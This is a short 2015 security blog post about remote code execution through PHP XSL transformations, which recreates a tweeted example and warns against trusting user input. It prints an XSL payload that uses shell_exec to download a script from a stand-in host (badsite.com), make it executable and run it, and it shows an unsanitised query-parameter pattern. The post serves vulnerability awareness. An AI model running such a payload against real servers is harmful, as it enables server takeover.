Tuesday, November 10, 2015

Digging Deeper on xsl payload ‏@e3xpl0it #XXE #RCE

I saw this tweet by ‏@e3xpl0it about Remote Code Execution in XSL (EXtensible Stylesheet Language) Transformations.



It contained as example of an XSL file that was running a php system command.

I wanted to see if I could recreate this scenario. I setup apache, I got php5-xsl installed. Then I created a sample test page like the code here.

Except I changed this line

<xsl:value-of select="php:function('ucfirst',string(uid))"/>

to something more evil like this

<xsl:value-of select="php::function('shell_exec', 'wget -O /tmp/bad.sh http://badsite.com/bad.sh; chmod 755 /tmp/bad.sh; ./bad.sh')"/>

Seemed to work! Uh-Oh, looks like OS Command injection might be possible. How? What if the code was dependent on user input? Perhaps the xsl is remotely loaded? Perhaps the setParameter sanitization is inadequate and a query string parameter could be used like this? I'm sure there are multiple ways to exploit.

$proc->setParameter('', 'queryValue', $_GET['queryId']);
...
<xsl:param name="queryValue"/>
...
<xsl:value-of select="$queryValue"/>
...


Now the bad guy is going to control your unsanitized user input by jamming some php function payloads into your queryValue and you can now say bye-bye to your server. It's owned.

Seems like it's worth your time to take a look at any XSL Transformations you're doing in php and make sure you're not trusting any user input.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

No comments:

Post a Comment